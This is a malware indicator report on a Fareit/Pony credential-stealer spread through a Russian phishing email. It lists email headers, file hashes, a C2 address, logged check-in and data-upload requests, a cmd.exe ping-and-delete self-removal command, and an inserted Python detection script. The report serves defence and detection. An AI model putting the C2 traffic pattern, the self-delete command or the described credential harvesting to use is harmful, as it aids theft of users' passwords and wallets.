#fareit_200919

VRad Sep 23rd, 2019 (edited) 1,938 Never
#IOC #OptiData #VR #fareit #pony #RARv5

https://pastebin.com/nDTPH9DF

previous_contact:
27/02/19    https://pastebin.com/wyRGBXfj
18/10/18    https://pastebin.com/u0D14L5r

FAQ:
https://radetskiy.wordpress.com/?s=fareit

attack_vector
--------------
email attach .RAR > exe > grab info and remove itself

email_headers
--------------
Received: from mail.tvema.ru (unknown [212.233.112.11])
Received: from li1376-249.members.linode.com (li1376-249.members.linode.com [139.162.213.249])  by mail.tvema.ru (Postfix)
Reply-To: Дарья Горшкова <AntonovaMarina54@rambler.ru>
From: Дарья Горшкова <NovikovaNA@mail.tvema.ru>
To: <user1@victim0>
Subject: Проверить договор за август
Date: Thu, 19 Sep 2019 22:38:42 -0700
Return-Path: NovikovaNA@mail.tvema.ru

files
--------------
SHA-256     1715dc2a0dbd94dff9593528b6cb0e2de90fd3b96b2fd994edd6d7b351b2260a
File name   Проект договора 20.09.2019.001        [RAR archive data, vbe, os: Unix]
File size   54.6 KB (55915 bytes)

SHA-256     01a715c34f00d0488b9e1211bf67da8809bc2ff109ea09419c83edfb881b51c8
File name   Проект договора 20.09.2019.exe        [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   121 KB (123904 bytes)

SHA-256     b8a2e0a50c878315fcfa40e2ca39e11fbba6d4b5818095d37a472e20a1232174
File name   get        [ASCII Pascal program text, with very long lines]
File size   194.87 KB (199544 bytes)

activity
**************

+ Collects information about installed applications
+ Attempts to access Bitcoin/ALTCoin wallets
+ Harvests credentials from local FTP client software
+ Harvests information related to installed mail clients

PL_SCR  attached RAR

C2  78.108.216.39

netwrk
--------------
[ssl]
104.16.54.3     blockchain.info         Client Hello
54.164.0.55     api.blockcypher.com     Client Hello

[http]
78.108.216.39       78.108.216.39   GET     /index.php?id=0&un=6f70657261746f72&cn=41504d3131   HTTP/1.1    WinHttp.WinHttpRequest.5.1
78.108.216.39       78.108.216.39   POST    /g_38472341.php                                     HTTP/1.0    Mozilla/4.0
78.108.216.39       78.108.216.39   GET     /index.php?id=0&un=6f70657261746f72&cn=41504d3131   HTTP/1.1    WinHttp.WinHttpRequest.5.1
78.108.216.39       78.108.216.39   POST    /g_38472341.php                                     HTTP/1.0    Mozilla/4.0

comp
--------------
Проект договора 20.09.2019.exe    3044    TCP 104.16.54.3     443 ESTABLISHED
Проект договора 20.09.2019.exe    3044    TCP 78.108.216.39   80  ESTABLISHED

proc
--------------
C:\Users\operator\Desktop\Проект договора 20.09.2019.exe
"C:\Users\operator\Desktop\Проект договора 20.09.2019.exe" dfsr
cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\operator\Desktop\Проект договора 20.09.2019.exe"
C:\Windows\system32\PING.EXE ping  127.0.0.1
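Two of the indicators above are reusable as detection logic rather than as one-off hashes: the check-in GET carries the logged-on user name and computer name hex-encoded in the `un` and `cn` query parameters (6f70657261746f72 decodes to "operator", 41504d3131 to "APM11"), and the final process line is the classic ping-then-del self-removal. The script below is an added example (not from the original paste or its author): it decodes such hex parameters from proxy-log lines and matches the self-delete command line. The tab-separated log format, the field order and the sample lines are constructed from the netwrk and proc sections of this paste.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines, copied from the indicators in this paste and
# laid out as tab-separated fields: src, dst, method, path, version, user-agent.
SAMPLE_HTTP = [
    "78.108.216.39\t78.108.216.39\tGET\t/index.php?id=0&un=6f70657261746f72&cn=41504d3131"
    "\tHTTP/1.1\tWinHttp.WinHttpRequest.5.1",
    "78.108.216.39\t78.108.216.39\tPOST\t/g_38472341.php\tHTTP/1.0\tMozilla/4.0",
]
SAMPLE_PROC = [
    r'"C:\Users\operator\Desktop\Проект договора 20.09.2019.exe" dfsr',
    r'cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\operator\Desktop\Проект договора 20.09.2019.exe"',
]

HEX_VALUE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# cmd.exe /c ping <anything> & del /F /Q "<path>.exe": ping is only a delay so the
# running binary can be deleted once its process has exited.
SELF_DELETE = re.compile(
    r'cmd\.exe\s+/c\s+ping\s+\S+\s*&\s*del\s+/F\s+/Q\s+"?(?P<target>[^"]+\.exe)', re.I
)


def decode_hex_params(path):
    """Return {param: text} for query values that are pure hex and decode to printable ASCII."""
    decoded = {}
    for key, values in parse_qs(urlsplit(path).query).items():
        for value in values:
            if not HEX_VALUE.match(value):
                continue
            try:
                text = bytes.fromhex(value).decode("ascii")
            except ValueError:  # odd length or non-ASCII bytes: not an encoded name
                continue
            if text.isprintable():
                decoded[key] = text
    return decoded


def check_http_line(line):
    """Flag Fareit/Pony-style traffic seen in this paste; return None for a clean line."""
    fields = line.split("\t")
    if len(fields) < 6:
        return None
    _src, dst, method, path, version, user_agent = fields[:6]
    reasons = []
    names = decode_hex_params(path)
    if "un" in names and "cn" in names:
        reasons.append(f"hex-encoded check-in: user={names['un']!r} host={names['cn']!r}")
    if user_agent.startswith("WinHttp.WinHttpRequest") and BARE_IP.match(dst):
        reasons.append("WinHttpRequest user-agent to a bare-IP host")
    if method == "POST" and version == "HTTP/1.0" and user_agent == "Mozilla/4.0" and BARE_IP.match(dst):
        reasons.append("HTTP/1.0 POST with generic Mozilla/4.0 user-agent to a bare-IP host")
    return {"dst": dst, "path": path, "names": names, "reasons": reasons} if reasons else None


def check_self_delete(cmdline):
    """Return the path the command line deletes if it matches the ping-then-del pattern, else None."""
    match = SELF_DELETE.search(cmdline)
    return match.group("target") if match else None


if __name__ == "__main__":
    for line in SAMPLE_HTTP:
        print(check_http_line(line))
    for cmd in SAMPLE_PROC:
        print(check_self_delete(cmd))
```

The hex-name check is the more durable of the two: the C2 address and the `g_*.php` gate name change between campaigns, while a bare-IP host receiving a user and computer name as hex is worth a look regardless of which family sent it.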

persist
--------------
no persist

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Cookies\7QU78IEN.txt

content:
__cfduid
d03b5687a15aabc7b04176f913db271801569250027
blockchain.info/
9216
1044408192
30839023
1812624219
30761340
*

# # #
https://www.virustotal.com/gui/file/1715dc2a0dbd94dff9593528b6cb0e2de90fd3b96b2fd994edd6d7b351b2260a/details
https://www.virustotal.com/gui/file/01a715c34f00d0488b9e1211bf67da8809bc2ff109ea09419c83edfb881b51c8/details
https://analyze.intezer.com/#/analyses/88b5a596-bd4c-41ec-93fb-b44a46bdc98a

https://www.virustotal.com/gui/file/b8a2e0a50c878315fcfa40e2ca39e11fbba6d4b5818095d37a472e20a1232174/details
https://analyze.intezer.com/#/analyses/3aad1fd6-3435-466f-ab84-26a0ce9b0fe7

VR

@